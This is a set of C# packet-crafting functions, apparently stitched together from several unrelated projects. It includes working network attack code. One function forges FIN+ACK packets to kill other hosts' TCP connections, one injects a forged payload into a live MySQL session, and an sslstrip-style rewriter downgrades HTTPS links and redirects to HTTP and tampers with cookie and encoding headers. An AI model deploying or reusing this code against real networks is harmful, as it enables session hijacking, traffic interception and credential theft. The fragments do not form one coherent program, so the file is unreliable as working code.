// IPv4 + TCP数据包封装函数
private EthernetPacket TcPonIPv4PacketMaker()
{
// Ether封包
var ether = new EthernetPacket(PhysicalAddress.Parse(MakeMaCaddr(SourceMAC1.Text, SourceMAC2.Text, SourceMAC3.Text, SourceMAC4.Text, SourceMAC5.Text, SourceMAC6.Text)),
PhysicalAddress.Parse(MakeMaCaddr(DestMAC1.Text, DestMAC2.Text, DestMAC3.Text, DestMAC4.Text, DestMAC5.Text, DestMAC6.Text)),
EthernetPacketType.IPv4);
// TCP封包
var tcp = new TcpPacket(Convert.ToUInt16(SourcePortTextBox.Text), Convert.ToUInt16(DestPortTextBox.Text))
{
Urg = TCPFlagsCheckedListBox.GetItemChecked(0),
Ack = TCPFlagsCheckedListBox.GetItemChecked(1),
Psh = TCPFlagsCheckedListBox.GetItemChecked(2),
Rst = TCPFlagsCheckedListBox.GetItemChecked(3),
Syn = TCPFlagsCheckedListBox.GetItemChecked(4),
Fin = TCPFlagsCheckedListBox.GetItemChecked(5),
SequenceNumber = Convert.ToUInt32(SequenceTextBox.Text),
AcknowledgmentNumber = Convert.ToUInt32(AcknowledgmentTextBox.Text),
WindowSize = Convert.ToUInt16(WindowSizeTextBox.Text),
UrgentPointer = Convert.ToInt32(UrgPointerTextBox.Text)
};
if (PayloadTextBox.Text.Length != 0)
{
tcp.PayloadData = Encoding.ASCII.GetBytes(PayloadTextBox.Text);
}
tcp.UpdateCalculatedValues();
// IPv4封包
var IPv4 = new IPv4Packet(IPAddress.Parse(MakeIPaddr(SourceIP1.Text, SourceIP2.Text, SourceIP3.Text, SourceIP4.Text)),
IPAddress.Parse(MakeIPaddr(DestIP1.Text, DestIP2.Text, DestIP3.Text, DestIP4.Text)))
{
TimeToLive = Convert.ToInt32(TTLTextBox.Text),
Protocol = IPProtocolType.TCP,
Version = IPVersion.IPv4,
FragmentFlags = Convert.ToInt16(FragmentFlagsTextBox.Text),
FragmentOffset = Convert.ToInt32(FragmentOffsetTextBox.Text),
TypeOfService = Convert.ToInt32(TOSTextBox.Text),
Id = Convert.ToUInt16(IdentifierTextbox.Text),
PayloadPacket = tcp
};
ether.PayloadPacket = IPv4;
IPv4.ParentPacket = ether;
IPv4.UpdateIPChecksum();
tcp.ParentPacket = IPv4;
tcp.UpdateTCPChecksum();
return(ether);
}
public static IPv4Packet CreateIpV4Packet(IPAddress sourceIpAddress, IPAddress destinationIpAddress,
TcpPacket payloadPacket)
{
var result = new IPv4Packet(sourceIpAddress, destinationIpAddress)
{
PayloadPacket = payloadPacket
};
payloadPacket.UpdateTCPChecksum();
result.UpdateIPChecksum();
result.UpdateCalculatedValues();
return(result);
}
private Packet GeneratePacket()
{
// FIXME in this case we always generate the same packet, but keep
// regenerating it -- this can be made more efficient!
var tcp_p = new TcpPacket(src_port, dst_port);
var ip_p = new IPv4Packet(src_ip, dst_ip);
var eth_p = new EthernetPacket(src_mac, dst_mac, EthernetPacketType.None);
eth_p.PayloadPacket = ip_p;
ip_p.PayloadPacket = tcp_p;
tcp_p.UpdateTCPChecksum();
ip_p.UpdateIPChecksum();
eth_p.UpdateCalculatedValues();
return(eth_p);
}
/// <summary>
/// 尝试发送FIN+ACK标志结束某一组互联网上的连接。
/// </summary>
/// <param name="srcAddress">连接的起点,应为小端地址。</param>
/// <param name="srcPort">连接起点的端口。</param>
/// <param name="dstAddress">连接的终点,应为大端地址。</param>
/// <param name="dstPort">连接终点的端口。</param>
/// <returns>成功发送包返回true,失败返回false。</returns>
public bool KillConnection(IPAddress srcAddress, ushort srcPort, IPAddress dstAddress, ushort dstPort)
{
EthernetPacket ether;
// 寻找指定目标
lock (_tcpLinks) {
if (_tcpLinks.All(item => !(item.SrcAddress.Equals(srcAddress) && item.SrcPort == srcPort) ||
!(item.DstAddress.Equals(dstAddress) && item.DstPort == dstPort)))
{
return(false);
}
ether = new EthernetPacket(_tcpLinks.Find(item => item.SrcAddress.Equals(srcAddress) && item.SrcPort == srcPort &&
item.DstAddress.Equals(dstAddress) && item.DstPort == dstPort)
.LastPacket.BytesHighPerformance);
}
// 解析包数据
var ipv4 = (IPv4Packet)ether.PayloadPacket;
var tcp = (TcpPacket)ipv4.PayloadPacket;
// 设置数据包内容
var payload = new TcpPacket(tcp.SourcePort, tcp.DestinationPort)
{
Fin = true,
Ack = true,
SequenceNumber = (uint)(tcp.SequenceNumber + (tcp.PayloadPacket?.TotalPacketLength ?? 0)),
AcknowledgmentNumber = tcp.AcknowledgmentNumber,
WindowSize = tcp.WindowSize
};
payload.UpdateCalculatedValues();
ipv4.PayloadPacket = payload;
payload.ParentPacket = ipv4;
payload.UpdateTCPChecksum();
_device.SendPacket(ether);
return(true);
}
void device_OnPacketArrival(object sender, CaptureEventArgs e)
{
var Now = DateTime.Now; // cache 'DateTime.Now' for minor reduction in cpu overhead
var interval = Now - _lastStatisticsOutput;
if (interval > _lastStatisticsInterval)
{
//Console.WriteLine("device_OnPacketArrival: " + e.Device.Statistics);
_captureStatistics = e.Device.Statistics;
_statisticsUiNeedsUpdate = true;
_lastStatisticsOutput = Now;
}
if (CaptureForm._pshPacket != null && _iRecvPackets <= RECEIVING_PACKED_EXPECTED)
{
Packet p = Packet.ParsePacket(e.Packet.LinkLayerType, e.Packet.Data);
TcpPacket tcp = TcpPacket.GetEncapsulated(p);
if (tcp.Psh && tcp.SourcePort == TARGET_PORT && tcp.PayloadData.Length > 0)
{
IPv4Packet ip = (IPv4Packet)IpPacket.GetEncapsulated(CaptureForm._pshPacket);
IPv4Packet lastAckIp = (IPv4Packet)IpPacket.GetEncapsulated(CaptureForm._lastAckPacket);
TcpPacket lastAckTcp = TcpPacket.GetEncapsulated(CaptureForm._lastAckPacket);
lastAckIp.Id = (ushort)(ip.Id + 10);
lastAckIp.UpdateIPChecksum();
lastAckTcp.SequenceNumber = tcp.AcknowledgmentNumber;
lastAckTcp.AcknowledgmentNumber = (uint)(tcp.SequenceNumber + tcp.PayloadData.Length);
lastAckTcp.UpdateTCPChecksum();
_device.SendPacket(CaptureForm._lastAckPacket);
CaptureForm._pshPacket = CaptureForm._lastAckPacket;
_iRecvPackets++;
}
}
lock (_queueLock)
_packetQueue.Add(e.Packet);
}
static void Ns_OnPacket(object sender, IPProtocolType protocolType, EthernetPacket packet)
{
NetworkSniffer ns = (NetworkSniffer)sender;
IPv4Packet ip = (IPv4Packet)packet.PayloadPacket;
TcpPacket t = (TcpPacket)ip.PayloadPacket;
// Si el paquete recibido es el de respuesta OK del mysql
if (t.PayloadData.SequenceEqual(ResponseOk))
{
Parent = packet;
// Replicamos el paquete, enviando el payload de la fila, si, antes de recibir el SELECT
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
ip.Id++;
t.SequenceNumber = LastSequenceId;
t.OptionsCollection.Clear();
t.PayloadData = Payload;
t.Ack = true;
t.Psh = true;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
else
{
// Si el paquete contiene el valor SELECT
string ascii = Encoding.ASCII.GetString(t.PayloadData);
if (Parent != null && ascii.Contains("SELECT"))
{
// Ya no actuamos mas
ns.OnPacket -= Ns_OnPacket;
ip = (IPv4Packet)Parent.PayloadPacket;
t = (TcpPacket)ip.PayloadPacket;
// Enviamos un ACK del paquete recibido, para darle por bueno
t.SequenceNumber = LastSequenceId;
t.AcknowledgmentNumber = t.AcknowledgmentNumber;
t.PayloadData = new byte[] { };
ip.Id++;
t.Ack = true;
t.Psh = false;
ip.UpdateCalculatedValues();
t.UpdateCalculatedValues();
ip.UpdateIPChecksum();
t.UpdateTCPChecksum();
ns.Send(packet);
Console.WriteLine(t.ToString(StringOutputType.Verbose));
}
}
}
// process packet
public bool ProcessPacket(Packet rawPacket, TcpPacket packet)
{
if (packet.ParentPacket == null)
{
return(true);
}
if (packet.PayloadData == null)
{
return(true);
}
var sourceIP = ((IpPacket)packet.ParentPacket).SourceAddress.ToString();
var destIP = ((IpPacket)packet.ParentPacket).DestinationAddress.ToString();
var payload = packet.PayloadData;
var data = encodingUtf8.GetString(payload);
if (data != string.Empty)
{
var changed = new List <string>();
var matches = SimpleRegex.GetMatches(regexType, data);
// HTTP request
if (matches.Count > 2)
{
// check for images - stop further processing
if (matches[2].Contains(".png") || matches[2].Contains(".jpg") || matches[2].Contains(".gif"))
{
return(true);
}
// check for Accept-Encoding and replace it to prevent unreadable data
if (data.Contains("Accept-Encoding:"))
{
var diff = data.Length - regexEncoding.Replace(data, "Accept-Encoding: \r\n").Length;
var extra = string.Empty;
for (int i = 0; i < diff; i++)
{
extra += " ";
}
data = regexEncoding.Replace(data, "Accept-Encoding: " + extra + "\r\n");
changed.Add("Accept-Encoding");
}
// check for If-Modified-Since and replace it to prevent caching
if (data.Contains("If-Modified-Since:"))
{
var time = new DateTime(2000, 1, 1);
data = regexModified.Replace(data, "If-Modified-Since: " + time.ToString("R") + "\r\n");
changed.Add("If-Modified-Since");
}
// check for cookies and strip them if necessary
if (stripCookies && data.Contains("Cookie:"))
{
data = data.Replace("Cookie:", "C00kie:");
changed.Add("Cookies");
}
}
// HTTP response
else
{
// check for html tags - stop further processing
if (!(data.Contains("<form") || data.Contains("<input") || data.Contains("<a ") || data.Contains("</a>") || data.Contains("</div>") || data.Contains("<meta") || data.Contains("javascript")))
{
return(true);
}
var cmatches = SimpleRegex.GetMatches(regexCType, data);
// check for images - stop further processing
if (cmatches.Count > 1 && cmatches[1].Contains("image"))
{
return(true);
}
// HTTP 302 redirect stripping
foreach (var item in stripRedirects)
{
if (data.Contains("Location: " + item))
{
data = data.Replace("Location: https://", "Location: http://");
changed.Add("HTTPS (302 redirect)");
}
}
// other links, actions...
if (data.Contains("\"https://") || data.Contains("'https://"))
{
data = data.Replace("\"https://", "\" http://");
data = data.Replace("'https://", "' http://");
changed.Add("HTTPS");
}
}
if (changed.Count > 0)
{
// change packet data to stripped one
var bytes = encodingUtf8.GetBytes(data);
var diff = packet.PayloadData.Length - bytes.Length;
packet.PayloadData = bytes;
packet.UpdateTCPChecksum();
// checksum fixes for IPv4 packets (IPv6 packet doesn't have a checksum)
if (packet.ParentPacket is IPv4Packet)
{
var ip = (IPv4Packet)packet.ParentPacket;
ip.TotalLength = ip.HeaderLength + packet.Bytes.Length;
ip.PayloadLength = (ushort)packet.Bytes.Length;
ip.Checksum = (ushort)(ip.Checksum + diff);
}
Stripped(sourceIP, destIP, changed);
}
}
return(true);
}
